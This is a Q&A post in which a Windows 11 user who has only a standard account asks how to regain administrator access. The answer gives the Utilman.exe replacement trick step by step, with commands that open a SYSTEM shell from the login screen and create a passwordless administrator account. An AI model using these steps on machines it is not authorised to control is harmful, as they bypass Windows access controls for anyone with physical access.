# How to create an Administrator account in a standard user?

Tags: windows, user-controls, admin, user-account-control

I'm having a **standard** user and I Can't create a new **administrator** user.
B'coz my Admin user is deleted by some problem.

B'coz the User Account Control box is showing. and I can't click the **yes** button.
So, please help me to solve this.
*I'm using windows 11*

Thank You.

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.

Answer (score 0):

The easiest thing to do is reinstall windows.

If you can't or won't, you can get permission in unintended ways, for example using the `Utilman.exe` exploit to get `nt authority\system` permissions, this mean booting into an instillation environment, find the system partition and replace `Utilman.exe` with `cmd.exe`, rebooting and on the login screen opening the accessibility panel will instead open a CMD as the with administrator permissions and from there create an account with administrative access.

From the recovery you can use this command to copy cmd.exe over utilman.exe (supposing the system drive is D:\ )

```
:: Making a backup of utilman.exe
copy utilman.exe utilman.exe.backup

:: Replacing utilman with cmd.exe
copy cmd.exe utilman.exe
```

And from the CMD getted on the login screen

```
:: Create a new user called Admin
net user Admin /add

:: Add the user Admin to the System administrators
net localgroup Administrators Admin /add
```

Then you can reboot and you will find an account called Admin without password and with administrative access